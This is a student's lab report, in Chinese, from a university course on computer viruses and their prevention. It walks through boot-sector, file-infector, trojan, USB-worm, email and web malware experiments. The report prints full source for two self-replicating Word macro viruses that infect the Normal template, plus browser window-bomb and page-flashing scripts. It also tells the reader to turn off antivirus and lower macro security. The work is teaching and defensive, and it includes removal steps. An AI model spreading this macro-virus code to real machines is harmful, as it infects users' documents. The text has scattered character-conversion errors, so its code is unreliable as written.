计算机病毒及防治实验报告
南京航空航天大学 计算机病毒及防治 上机实验报告 学院: 理学院 专业: 信息与计算科学 学号: 081310128 姓名: 王晨雨 授课老师: 薛明富 二〇一六年十二月
目录 实验一:引导型病毒实验............................................... 1 实验二:病毒实验..................................................... 6 实验三:PE 文件格式实验 .............................................. 9 实验四:32 位文件型病毒实验 ......................................... 10 实验五:简单得木马实验.............................................. 13 实验七:木马病毒清除实验(选做)...................................... 17 实验八:Word 宏病毒实验(一) ......................................... 20 实验九:Word 宏病毒实验(二) ......................................... 25 实验十:Linux 脚本病毒实验(选做) .................................... 29 实验十二:基于 U 盘传播得蠕虫病毒实验................................ 29 实验十三:邮件型病毒实验............................................ 32 实验十四:Web 恶意代码实验 .......................................... 35
实验一: 引导型病毒实验 【实验目得】
通过实验,了解引导区病毒得感染对象与感染特征,重点学习引导病毒得感染机制与恢复感染病毒文件得方法,提高汇编语言得使用能力。
实验内容 引导阶段病毒由软盘感染硬盘实验。通过触发病毒,观察病毒发作得现象与步骤,学习病毒得感染机制:阅读与分析病毒得代码。
DOS 运行时病毒由硬盘感染软盘得实现。通过触发病毒,观察病毒发作得现象与步骤,学习病毒得感染机制:阅读与分析病毒得代码。
【实验平台】
】
VMWare Workstation 12 PRO MSDOS 7、10
【试验内容】
】
第一步:环境安装 安装虚拟机 VMWare,在虚拟机环境内安装 MSDOS 7、10 环境。
第二步:软盘感染硬盘 1) 运行虚拟机,检查目前虚拟硬盘就是否含有病毒,图 1 表示没有病毒正常启动硬盘得状态。
2) 在附书资源中复制含有病毒得虚拟软盘 virus、img 3) 将含有病毒得软盘插入虚拟机引导,可以瞧到闪动得字符*^_^*,如图 2 所示,按任意键进入图 3。
第三步:验证硬盘已经被感染 1) 取出虚拟软盘,通过硬盘引导,再次出现了病毒得画面如图 4。
2) 按任意键后正常引导了 DOS 系统如图 5。可见,硬盘已被感染。
第四步:硬盘感染软盘 1) 下载 empty、img,并且将它插入虚拟机,启动计算机,由于该盘为空,如图 6、 2) 取出虚拟软盘,从硬盘启动,通过命令format A:/q快速格式化软盘。可能提示出错,这时只要按 R 键即可。如图 7、 3) 成功格式化后得结果如图 8。
4) 不要取出虚拟软盘,重新启动虚拟机,这时就是从 empty、img 引导,可以瞧到病毒得画面,如图 9。按任意键进入图 10、可见,病毒已经成功由硬盘传染给了软盘。
实验截图: :
1. 软盘启动后:
2. 硬盘启动后:
实验二 二: 病毒实验 【实验目得】
1、掌握病毒得传播原理。
2、掌握 MASM611 编译工具得使用。
【实验平台】
】
1、MSDOS 7、10 2、MASM611 【试验内容】
】
1、 安装 MSDOS 7、10 环境。虚拟机安装该环境亦可,步骤在此不再赘述。
2、 在 MSDOS C:\MASM 目录下安装 MASM611,然后将 binr 目录下得 link、exe 复制到 bin 目录下。
3、 在目录下复制病毒程序 Virus、asm 及测试程序源代码 BeInfected、asm 4、 编译链接 BeInfected、asm,形成 BeInfected 测试程序 5、 编译链接 virus、asm,生成病毒程序 virus、exe。
6、 在 C:\MASM\Bin 目录下建立 del、txt 文件,并且将“test、”与病毒代码 2“virus、asm”复制到此目录下。
7、 执行“test、”观察结果。
8、 编译并连接 “virus、asm” 生成“virus、exe”,执行此 exe 文件以感染“test、”文件并且自动删除 del、txt,而后执行“test、”可以发现感染后得结果。
实验截图: :
1. 编译存储好文件:
2. Dos 下查瞧文件夹内容: 3. 查瞧 TEST 得内容:
4. 运行病毒程序: 5. 查瞧感染病毒后文件夹内容: 6. 查瞧感染病毒后 TEST 得内容:
实验三 三:PE 文件格式实验 【 实验目得 】
了解 PE 文件基本结构 【 实验环境 】
运行环境:Windows 2000、Windows 9x、Windows NT 以及 Windows XP 编译环境: Visual Studio 6、0 【 实验步骤 】
使用编译环境打开源代码工程,编译后可以生成 winpe、exe。
预备步骤:找任意一个 Win32 下得 Exe 文件作为查瞧对象。
实验内容:运行 winpe、exe,并打开任一 exe 文件,选择不同得菜单,可以查瞧到 exe 文件得内部结构。
实验截图: :
感染前
感染后
第一处:
第二处:
第三处:
第四处:
第五处: 感染前:
感染后:
实验四 四:32 位文件型病毒实验 【 实验目得】
】
了解文件型病毒得基本制造过程 了解病毒得感染、破坏机制,进一步认识病毒程序 掌握文件型病毒得特征与内在机制 【 实验环境】
】
运行环境 Windows 2000、Windows 9x、Windows NT 与 Windows XP 【 实验步骤】
】
目录中得 virus、rar 包中包括 Virus、exe(编译得病毒程序)、软件使用说明书、doc(请仔细阅读)、源代码详解、doc(对代码部分加入了部分注释)以及 pll、asm(程序源代码)。Example、rar 包中选取得就是一个常用程序(ebookedit)安装后得安装目录下得程序,用于测试病毒程序。
预备步骤:将 example、rar 解压到某个目录。解压完毕后,应该在该目录下有 Buttons目录、ebookcode、exe、ebookedit、exe、ebrandit、exe 以及 keymaker、exe 等程序,然后把 virus、rar 包解压后得 Virus、exe 复制到该目录中。
实验内容:通过运行病毒程序观瞧各步得提示以了解病毒得内在机制。
实验截图: :
1、感染前准备:
2、感染过程:
3、感染后:
4、感染文件比对
实验五 五: 简单得木马实验 【 实验目得】
】
掌握木马得基本原理 【 实验环境】
】
Windows XP 操作系统 Visual Studio 6、0 编程环境 【 实验步骤】
】
(1)
复制实验文件到实验得计算机上。其中,SocketListener 目录下就是木马 Server 端源代码,Socketmand 目录下就是木马 Client 端源代码。
(2)
用 Visual Studio 6、0 环境分别编译这两部分代码。
(3)
运行 SocketListener 应用程序,也就就是启动了木马被控端。
(4)
运行 Socketmand 应用程序,也就就是启动了木马得控制端,可以在控制端执行命令来控制被控制端。实验支持得命令参考表: 命令
命令含义
CMD 执行应用程序 !SHUT 退出木马
获得远程文件 EDITCONF 编辑配置文件 LIST 列目录 VIEW 查瞧文件内容 CDOPEN 关 CD CDCLOSE 开 CD REBOOT 重启远端计算机
实验截图: :
1、建立连接:
2、发送指令及成功后结果: (1)
运行程序:
(2)
关闭木马: (3)
获得文件:
(4)
编辑配置文件: (5)
查瞧文件:
(6)
查瞧文件内容: (7)
重启计算机:
实验七 七: 木马病毒清除实验( 选做) 【 实验目得】
】
掌握木马病毒清除得基本原理 【 实验平台】
】
Windows 32 位操作系统 Visual Studio 7、0 编译环境 【 实验步骤】
】
文件 Antitrojan、sln 为工程文件。使用 Visual Studio 编译该工程,生成 Antitrojan、exe 可执行程序。执行 Antitrojan、exe 观察执行效果。
实验截图: :
1. 确认木马存在: 2. 进行编译: (1)
修改试验机名字:
(2)
添加查杀代号: (3)
添加查杀代码:
3. 清除成功:
实验八 八:Word 宏病毒实验( 一) 实验目得
Word 宏就是指能组织到一起为独立命令使用得一系列 Word 指令,它能使日常工作变得容易。本实验演示了宏得编写,通过两个简单得宏病毒示例,说明宏得原理及其安全漏洞与缺陷,理解宏病毒得作用机制,从而加强对宏病毒得认识,提高防范意识。
实验所需条件与环境 硬件设备:局域网,终端 PC 机。
系统软件:Windows 系列操作系统 支撑软件:Word 2003 软件设置:关闭杀毒软;打开 Word 2003,在工具宏安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装得加载项与模板,选择信任 visual basic 项目得访问 实验环境配置如下图所示: 受感染终端受感染Word文档被感染终端 宏病毒传播示意图 实验内容与分析
为了保证该实验不至于造成较大得破坏性,进行实验感染后,被感染终端不要打开过多得 word 文档,否则清除比较麻烦(对每个打开过得文档都要清除)。
例 例 1 自我复制, 感染 word 公用模板与当前文档 代码如下: "MicroVirus Sub Document_Open
On Error Resume Next Application、DisplayStatusBar = False Options、SaveNormalPrompt = False Ourcode = ThisDocument、VBProject、VBponents(1)、CodeModule、Lines(1, 100) Set Host = NormalTemplate、VBProject、VBponents(1)、CodeModule If ThisDocument = NormalTemplate Then
Set Host = ActiveDocument、VBProject、VBponents(1)、CodeModule End If With Host
If 、Lines(1、1) <> ""MicroVirus" Then
、DeleteLines 1, 、CountOfLines
、InsertLines 1, Ourcode
、ReplaceLine 2, "Sub Document_Close"
If ThisDocument = nomaltemplate Then
、ReplaceLine 2, "Sub Document_Open"
ActiveDocument、SaveAs ActiveDocument、FullName
End If
End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个 word 文档,然后按 Alt+F11 调用宏编写窗口(工具宏Visual Basic宏编辑器),在左侧得 project—>Microsoft Word 对象ThisDocument 中输入以上代码,保存,此时当前 word 文档就含有宏病毒,只要下次打开这个 word 文档,就会执行以上代码,并将自身复制到 Normal、dot(word 文档得公共模板)与当前文档得 ThisDocument 中,同时改变函数名(模板中为 Document_Close,当前文档为 Document_Open),此时所有得 word 文档打开与关闭时,都将运行以上得病毒代码,可以加入适当得恶意代码,影响 word 得正常使用,本例中只就是简单得跳出一个提示框。
代码解释
以上代码得基本执行流程如下: 1) 进行必要得自我保护 Application、DisplayStatusBar = False Options、SaveNormalPrompt = False 高明得病毒编写者其自我保护将做得非常好,可以使 word 得一些工具栏失效,例如将工具菜单中得宏选项屏蔽,也可以修改注册表达到很好得隐藏效果。
本例中只就是屏蔽状态栏,以免显示宏得运行状态,并且修改公用模板时自动保存,不给用户提示。
2) 得到当前文档得代码对象与公用模板得代码对象 Ourcode = ThisDocument、VBProject、VBponents(1)、CodeModule、Lines(1, 100) Set Host = NormalTemplate、VBProject、VBponents(1)、CodeModule If ThisDocument = NormalTemplate Then
Set Host = ActiveDocument、VBProject、VBponents(1)、CodeModule
End If 3) 检查模板就是否已经感染病毒,如果没有,则复制宏病毒代码到模板,并且修改函数名。
With Host
If 、Lines(1、1) <> ""MicroVirus" Then
、DeleteLines 1, 、CountOfLines
、InsertLines 1, Ourcode
、ReplaceLine 2, "Sub Document_Close"
If ThisDocument = nomaltemplate Then
、ReplaceLine 2, "Sub Document_Open"
ActiveDocument、SaveAs ActiveDocument、FullName
End If
End If End With 4) 执行恶意代码 MsgBox "MicroVirus by Content Security Lab" 实验截图
: :
1、复制代码
2、感染病毒后现象
3、感染其她文档
实验九 九:Word 宏病毒实验( 二) 例 例 2 具有一定破坏性得宏 我们可以对上例中得恶意代码稍加修改,使其具有一定得破坏性(这里以著名宏病毒“台湾一号”得恶意代码部分为基础,为使其在 word2003 版本中运行,且降低破坏性,对源代码作适当修改)。
完整代码如下: "moonlight Dim nm(4) Sub Document_Open "DisableInput 1 Set ourcodemodule = ThisDocument、VBProject、VBponents(1)、CodeModule Set host = NormalTemplate、VBProject、VBponents(1)、CodeModule If ThisDocument = NormalTemplate Then
Set host = ActiveDocument、VBProject、VBponents(1)、CodeModule End If With host If 、Lines(1, 1) <> ""moonlight" Then
、DeleteLines 1, 、CountOfLines 、InsertLines 1, ourcodemodule、Lines(1, 100) 、ReplaceLine 3, "Sub Document_Close"
If ThisDocument = NormalTemplate Then
、ReplaceLine 3, "Sub Document_Open"
ActiveDocument、SaveAs ActiveDocument、FullName
End If End If End With Count = 0 If Day(Now) = 1 Then try:
On Error GoTo try
test = 1
con = 1
tog$ = ""
i = 0
While test = 1
For i = 0 To 4
nm(i) = Int(Rnd * 10)
con = con * nm(i)
If i = 4 Then
tog$ = tog$ + Str$(nm(4)) + "=?"
GoTo beg
End If
tog$ = tog$ + Str$(nm(i)) + "*"
Next i beg:
Beep
ans$ = InputBox$("今天就是" + Date$ + ",跟您玩一个心算游戏" + Chr$(13) + "若您答错,只好接受震撼教育、、、、、、" + Chr$(13) + tog$, "台湾 NO、1 Macro Virus")
If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
Documents、Add
Selection、Paragraphs、Alignment = wdAlignParagraphCenter
Beep
With Selection、Font
、Name = "细明体"
、Size = 16
、Bold = 1
、Underline = 1
End With
Selection、InsertAfter Text:="何谓宏病毒"
Selection、InsertParagraphAfter
Beep
Selection、InsertAfter Text:="答案:"
Selection、Font、Italic = 1
Selection、InsertAfter Text:="我就就是、、、、、、"
Selection、InsertParagraphAfter
Selection、InsertParagraphAfter
Selection、Font、Italic = 0
Beep
Selection、InsertAfter Text:="如何预防宏病毒"
Selection、InsertParagraphAfter
Beep
Selection、InsertAfter Text:="答案:"
Selection、Font、Italic = 1
Selection、InsertAfter Text:="不要瞧我、、、、、、"
GoTo out
Else
Count = Count + 1
For j = 1 To 20
Beep
Documents、Add
Next j
Selection、Paragraphs、Alignment = wdAlignParagraphCenter
Selection、InsertAfter Text:="宏病毒"
If Count = 2 Then GoTo out
GoTo try
End If Wend End If out: End Sub
该病毒得效果如下:当打开被感染得 word 文档时,首先进行自我复制,感染 word 模板,然后检查日期,瞧就是否就是 1 日(即在每月得 1 日会发作),然后跳出一个对话框,要求用户进行一次心算游戏,这里只用四个小于 10 得数相乘,如果作者得计算正确,那么就会新建一个文档,跳出如下字幕: 何谓宏病毒
答案: : 我就就是 、、、、、、
如何预防宏病毒
答案: : 不要瞧我 、、、、、、
如果计算错误,新建 20 个写有“宏病毒”字样得 word 文档,然后再一次进行心算游戏,总共进行 3 次,然后跳出程序。关闭文档得时候也会执行同样得询问。
清除宏病毒
对每一个受感染得 word 文档进行如下操作。
打开受感染得 word 文档,进入宏编辑环境(Alt+F11),打开 NormalMicrosoft Word 对象This Document,清除其中得病毒代码(只要删除所有内容即可)。
然后打开 ProjectMicrosoft WordThis Document,清除其中得病毒代码。
实际上,模板得病毒代码只要在处理最后一个受感染文件时清除即可,然而清除模板病毒后,如果重新打开其她已感染文件,模板将再次被感染,因此为了保证病毒被清除,可以查瞧每一个受感染文档得模板,如果存在病毒代码,都进行一次清除。
实验截图: :
1. 复制代码: 2. 感染现象:
实验十 十:Linux 脚本病毒实验( 选做) 实验 十二: 基于 U 盘传播得蠕虫病毒实验 【 实验目得】
】
理解 U 盘蠕虫病毒得传染原理。
【 实验环境】
】
VMWare Workstation 5、5、3 Windows XP SP2 【 实验步骤】
】
(1)
实验素材:在附书资源目录 Experiment\wormu 下 (2)
检查干净得电脑各分区就是否存在 autorun、inf 与病毒文件 virus、exe (3)
插入含有病毒得 U 盘,U 盘得右键菜单出现 auto 后,双击 U 盘,观察现在各个分区得情况 (4)
查瞧 autorun、inf 文件内容。
(5)
观察病毒触发后得效果。
(6)
插入干净得 U 盘,观察 U 盘就是否被感染。
【 实验注意事项】
】
(1)
实验前,请关闭杀毒软件。否则病毒样本会被自动杀除。
(2)
请注意操作系统得版本。Windows XP SP2 及以下版本都适用。
实验截图: :
1、编译后生成:
2、运行效果:
实验 十三: 邮件型病毒实验 【 实验目得】
】
掌握邮件型病毒基本原理 【 实验环境】
】
Windows XP 操作系统 Outlook 邮件客户端 【 实验步骤】
】
(7)
在 Outlook 中设置用户账号 (8)
在 Outlook 地址簿中添加联系人 (9)
在实验得计算机上得 C 根目录下创建空文件 test、vbs (10)
关闭反病毒软件得实时防护功能 (11)
把实验代码录入到 test、vbs 文件里。
(12)
运行脚本文件,程序启动 Outlook(由于现在得 Outlook 版本较高,Outlook 会提示就是否允许操作,请选择允许)发送邮件 【 实验注意事项】
】
(3)
要成功实验,系统必须安装 Outlook Application 应用软件 (4)
为了不给您得地址簿联系人发送垃圾邮件,可以先将地址簿中得联系人导出,然后输入实验用邮件地址。实验结束后,再重新导入原理地址簿中得联系人。
(5)
程序运行后,打开实验邮箱查瞧实验结果。一般而言,由于现在得邮件服务器都会对邮件进行扫描,所以传送了病毒得邮件不能传送到邮箱。解决办法就是:将程序中得一个语句 ObjMail、Attachments、Add(“C:\test、vbs”)删除,或者将附件 test、vbs 文件内容改为其她内容。
实验截图: :
1. 将文件存放在 C 盘,并且修改好文件: 2. 运行文件,发送邮件: 3. 发送以及收到邮件:
实验 十四:Web 恶意代码实验 实验一: 【实验目得】
掌握网页恶意代码基本原理。
【实验平台】
Windows XP 操作系统 IE(Internet Explorer)浏览器
【实验步骤】
从光盘上拷贝实验文件到实验机器上(源码位置:光盘盘符:\Experiment\IEMalware\1、html)。
用 IE 打开该文件,IE 不断得打开 163 网页。
如果 IE 阻止了显示内容,右键点击出现得提示信息,选择“允许阻止得内容”,就可以瞧到实验现象。
【程序源码】
<html> <body onload = "WindowBomb"> <SCRIPT LANGUAGE = "javascript"> function WindowBomb { while (true){ window、open("") } } </script> </body> </html> 实验二: 【实验目得】
掌握网页恶意代码基本原理。
【实验平台】
Windows XP 操作系统 IE(Internet Explorer)浏览器
【实验步骤】
从光盘上拷贝实验文件到实验机器上(源码位置:光盘盘符:\Experiment\IEMalware\2、html)。
IE 显示得地方出现黑白颜色不断得闪动。
如果 IE 阻止了显示内容,右键点击出现得提示信息,选择“允许阻止得内容”,就可以瞧到实验现象。
【程序源码】
<html> <body> <script> var color = new Array color[0]="black" color[1]="white" x = 0 ; while(true){
document、bgColor=color[x++];
document、bgColor=color[x]; } </script> </body> </html> 实验截图: :
实验一: 实验二:
上一篇:碰撞与动量守恒实验报告(1)
下一篇:原子力显微镜AFM实验报告